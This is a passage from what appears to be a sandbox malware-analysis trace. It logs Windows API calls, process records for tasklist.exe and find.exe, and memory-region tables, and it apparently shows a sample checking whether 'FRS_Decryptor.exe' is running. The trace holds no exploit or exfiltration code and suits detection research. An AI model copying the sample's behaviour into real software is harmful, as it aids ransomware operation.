returned 2 [0130.212] GetConsoleTitleW (in: lpConsoleTitle=0xbefb24, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0130.212] InitializeProcThreadAttributeList (in: lpAttributeList=0xbefa50, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xbefa34 | out: lpAttributeList=0xbefa50, lpSize=0xbefa34) returned 1 [0130.212] UpdateProcThreadAttribute (in: lpAttributeList=0xbefa50, dwFlags=0x0, Attribute=0x60001, lpValue=0xbefa3c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xbefa50, lpPreviousValue=0x0) returned 1 [0130.212] GetStartupInfoW (in: lpStartupInfo=0xbefa88 | out: lpStartupInfo=0xbefa88*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2b8, hStdError=0x2c)) [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.213] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.214] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.214] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xbef9d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xbefa24 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xbefa24*(hProcess=0x60, hThread=0x54, dwProcessId=0x3d8, dwThreadId=0x308)) returned 1 [0130.233] CloseHandle (hObject=0x54) returned 1 [0130.233] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.233] GetEnvironmentStringsW () returned 0xdcad78* [0130.233] FreeEnvironmentStringsA (penv="=") returned 1 [0130.233] DeleteProcThreadAttributeList (in: lpAttributeList=0xbefa50 | out: lpAttributeList=0xbefa50) [0130.233] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0130.233] _close (_FileHandle=4) returned 0 [0130.233] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0130.666] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xbefd98 | out: lpExitCode=0xbefd98*=0x0) returned 1 [0130.666] CloseHandle (hObject=0x64) returned 1 [0130.666] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0130.667] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xbefd98 | out: lpExitCode=0xbefd98*=0x0) returned 1 [0130.668] CloseHandle (hObject=0x60) returned 1 [0130.668] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0130.668] SetConsoleMode (hConsoleHandle=0x2b8, dwMode=0x0) returned 0 [0130.668] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0130.668] GetConsoleMode (in: hConsoleHandle=0x2b8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0130.668] _get_osfhandle (_FileHandle=0) returned 0x24 [0130.668] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0130.668] SetConsoleInputExeNameW () returned 0x1 [0130.668] GetConsoleOutputCP () returned 0x1b5 [0130.668] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0130.668] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.668] exit (_Code=0) Process: id = "140" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x5e45000" os_pid = "0x3ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "139" os_parent_pid = "0x518" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7204 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 7205 start_va = 0xda0000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 7206 start_va = 0xdc0000 end_va = 0xdc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 7207 start_va = 0xdd0000 end_va = 0xddefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 7208 start_va = 0xde0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 7209 start_va = 0xe20000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 7210 start_va = 0xe60000 end_va = 0xe63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 7211 start_va = 0xe70000 end_va = 0xe70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 7212 start_va = 0xe80000 end_va = 0xe81fff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 7213 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7214 start_va = 0x7e460000 end_va = 0x7e482fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e460000" filename = "" Region: id = 7215 start_va = 0x7e48b000 end_va = 0x7e48bfff entry_point = 0x0 region_type = private name = "private_0x000000007e48b000" filename = "" Region: id = 7216 start_va = 0x7e48c000 end_va = 0x7e48efff entry_point = 0x0 region_type = private name = "private_0x000000007e48c000" filename = "" Region: id = 7217 start_va = 0x7e48f000 end_va = 0x7e48ffff entry_point = 0x0 region_type = private name = "private_0x000000007e48f000" filename = "" Region: id = 7218 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7219 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7220 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7221 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7223 start_va = 0xfc0000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 7224 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7225 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7226 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7249 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 7250 start_va = 0xdb0000 end_va = 0xdb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 7251 start_va = 0xdc0000 end_va = 0xdc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 7252 start_va = 0xe90000 end_va = 0xf0dfff entry_point = 0xe90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7253 start_va = 0xf10000 end_va = 0xf10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 7254 start_va = 0xf20000 end_va = 0xf20fff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 7255 start_va = 0xf30000 end_va = 0xf30fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 7256 start_va = 0xf40000 end_va = 0xf43fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 7257 start_va = 0xf50000 end_va = 0xf50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 7258 start_va = 0xf60000 end_va = 0xf60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 7259 start_va = 0x1010000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 7260 start_va = 0x1110000 end_va = 0x1297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 7261 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 7262 start_va = 0x12c0000 end_va = 0x1440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Region: id = 7263 start_va = 0x1450000 end_va = 0x284ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001450000" filename = "" Region: id = 7264 start_va = 0x2850000 end_va = 0x2991fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002850000" filename = "" Region: id = 7265 start_va = 0x29a0000 end_va = 0x2c74fff entry_point = 0x29a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7266 start_va = 0x2c80000 end_va = 0x307bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c80000" filename = "" Region: id = 7267 start_va = 0x734b0000 end_va = 0x73510fff entry_point = 0x734b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 7268 start_va = 0x73520000 end_va = 0x7352bfff entry_point = 0x73520000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 7269 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 7270 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 7271 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 7272 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 7273 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 7274 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 7275 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 7276 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 7277 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7278 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7279 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7280 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7281 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7282 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7283 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7284 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 7285 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7286 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7287 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7288 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7289 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7290 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 7291 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7292 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7293 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7294 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7295 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7296 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7297 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7298 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7299 start_va = 0x7e360000 end_va = 0x7e45ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e360000" filename = "" Region: id = 7300 start_va = 0x73460000 end_va = 0x734a1fff entry_point = 0x73460000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 7313 start_va = 0xf70000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 7314 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 7315 start_va = 0x3080000 end_va = 0x30bffff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 7316 start_va = 0x30c0000 end_va = 0x30fffff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 7317 start_va = 0x3100000 end_va = 0x313ffff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 7318 start_va = 0x3140000 end_va = 0x317ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 7319 start_va = 0x73410000 end_va = 0x7341ffff entry_point = 0x73410000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 7320 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 7321 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 7322 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 7323 start_va = 0x7e35d000 end_va = 0x7e35ffff entry_point = 0x0 region_type = private name = "private_0x000000007e35d000" filename = "" Region: id = 7324 start_va = 0x7e485000 end_va = 0x7e487fff entry_point = 0x0 region_type = private name = "private_0x000000007e485000" filename = "" Region: id = 7325 start_va = 0x7e488000 end_va = 0x7e48afff entry_point = 0x0 region_type = private name = "private_0x000000007e488000" filename = "" Region: id = 7326 start_va = 0x73360000 end_va = 0x7340afff entry_point = 0x73360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Thread: id = 395 os_tid = 0x40c Thread: id = 397 os_tid = 0x464 Thread: id = 398 os_tid = 0x8c8 Thread: id = 399 os_tid = 0x6c4 Process: id = "141" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0xea94000" os_pid = "0x3d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "139" os_parent_pid = "0x518" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7227 start_va = 0xb00000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 7228 start_va = 0xb20000 end_va = 0xb21fff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 7229 start_va = 0xb30000 end_va = 0xb3efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 7230 start_va = 0xb40000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 7231 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 7232 start_va = 0xbc0000 end_va = 0xbc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 7233 start_va = 0xbd0000 end_va = 0xbd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 7234 start_va = 0xbe0000 end_va = 0xbe1fff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 7235 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 7236 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7237 start_va = 0x7eb30000 end_va = 0x7eb52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb30000" filename = "" Region: id = 7238 start_va = 0x7eb59000 end_va = 0x7eb59fff entry_point = 0x0 region_type = private name = "private_0x000000007eb59000" filename = "" Region: id = 7239 start_va = 0x7eb5c000 end_va = 0x7eb5efff entry_point = 0x0 region_type = private name = "private_0x000000007eb5c000" filename = "" Region: id = 7240 start_va = 0x7eb5f000 end_va = 0x7eb5ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb5f000" filename = "" Region: id = 7241 start_va = 